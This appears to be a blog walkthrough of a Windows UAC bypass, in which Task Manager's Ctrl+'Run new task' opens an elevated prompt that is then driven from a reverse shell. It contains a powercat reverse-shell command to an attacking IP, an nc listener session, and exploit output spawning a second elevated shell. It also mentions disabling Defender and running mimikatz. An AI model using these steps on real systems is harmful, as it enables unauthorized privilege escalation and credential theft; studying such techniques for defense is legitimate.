Easy UAC bypass using Task Manager
The primary objective of this writeup is to check if an attacker can use this technique to bypass UAC and gain additional privilege ONLY using Command / Powershell window got from a Reverse Shell.
User Account Control (UAC) in Windows is a “feature” (do not know how to attribute it) which can be used to prevent a user from making unwanted changes into the system. When running a application in a privileged permission, Windows asks the user if the action is actually legit. This empowers the user with the option to deny any process which is trying to perform actions as “Administrator”.
As per Microsoft:
User Account Control (UAC) is a Windows security feature designed to protect the operating system from unauthorized changes. When changes to the system require administrator-level permission, UAC notifies the user, giving the opportunity to approve or deny the change. UAC improves the security of Windows devices by limiting the access that malicious code has to execute with administrator privileges. UAC empowers users to make informed decisions about actions that may affect the stability and security of their device.
Even if you login in Windows as Administrator user, permissions are not granted to make system changes. After you confirm the UAC window, the necessary privileges are provided and provided to the user. We can see the difference from the screenshot below:
The difference between two window of PowerShell is UAC. We can easily see the permission difference between these two.
Now if an attacker is able to access your system, there is almost no way to change your permission from normal user to Administrator unless you have RDP access. Because as per my knowledge, UAC is User Interface based and there is no way you can do it via a Command Prompt. There are few techniques which can allow an attacker to bypass UAC and get more permission to modify system changes. In this post I would like to share a technique I have just learned.
Interestingly, there is a “feature” in Task Manager where if you Click on “Run new task” while you are pressed on Ctrl, a Command Prompt will come up with Administrator privilege WITHOUT any UAC request. You can see that both in Window 10 (1703) and Windows 11 (22H2) version
And in same thing in Window 11
I really wanted to share the source from where I obtained this information but unfortunately, I forgot. You can find additional information from the Reference 1 if you want.
As bypassing Microsoft Defender is not the primary concern, I will disable them by running the command before starting anything as most of the command / script is considered malicious in nature and will be blocked.
We will be using two separate reverse shell one is a regular with no additional permission and another will be initiated by the code which will basically run the “exploit”.
Lets download the
powercat script and add the following:
powercat -c 192.168.0.17 -p 8888 -e cmd.exe
192.168.0.17 is my attacking VM. Now if we run the
powercat we should get the reverse shell:
$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.0.17] from (UNKNOWN) [192.168.0.16] 49900 Microsoft Windows [Version 10.0.15063] (c) 2017 Microsoft Corporation. All rights reserved. C:\Users\user1> C:\Users\user1>whoami whoami desktop-t26ftc0\user1 C:\Users\user1>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ==================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled
As we can see that the privilege we have is normal and does not allow use to perform any administrative functions.
From the reference 1 we lets download the code and build the code using Visual Studio (ConsoleApplication1.exe). The code is originally used to run
echo some text into the window. Now I would like to change the code to run a reverse shell code which have obtained and compiled from reference 2. The second reverse shell (re.exe) would use port
After we build the “exploit” code which run the
re.exe it will send out another reverseshell to port
4444 and lets open another listener in another window and execute the “exploit” code from the first reverse shell.
C:\Users\user1>cd "C:\Users\user1\source\repos\ConsoleApplication1\x64\Release" cd "C:\Users\user1\source\repos\ConsoleApplication1\x64\Release" C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>dir dir Volume in drive C has no label. Volume Serial Number is 1AF6-1DD9 Directory of C:\Users\user1\source\repos\ConsoleApplication1\x64\Release 09/02/2023 12:40 PM <DIR> . 09/02/2023 12:40 PM <DIR> .. 09/02/2023 12:40 PM 15,872 ConsoleApplication1.exe 09/02/2023 12:40 PM 634,880 ConsoleApplication1.pdb 2 File(s) 650,752 bytes 2 Dir(s) 4,807,606,272 bytes free C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>ConsoleApplication1.exe ConsoleApplication1.exe Task Manager window found High IL cmd.exe window found The string 'cmd /c C:\users\user1\Desktop\re.exe' has been sent to the High IL cmd.exe! Current process respawned with UIAccess flag C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>
We should get another reverse shell as shown below:
As we can see we have elevated out privilege and have additional permission to perform system operation without the user requiring any UAC or anything else. Now we can perform additional operations like running
mimikatz to gain additional information and if it is a workstation connected to a Active Directory system, consequences could be severe.
I have also tested this on Windows 11 as well and it works.
The information provided on this website is for educational and informational purposes only. The website owner and contributors do not condone or encourage any illegal activities, including hacking, cyberattacks, or unauthorized access to computer systems or networks.
All information and tools provided on this website are to be used at your own risk. We do not take any responsibility for how you choose to use the information or tools provided here. Users are strongly encouraged to conduct their own research and follow ethical guidelines and legal regulations when using the information and tools presented on this website.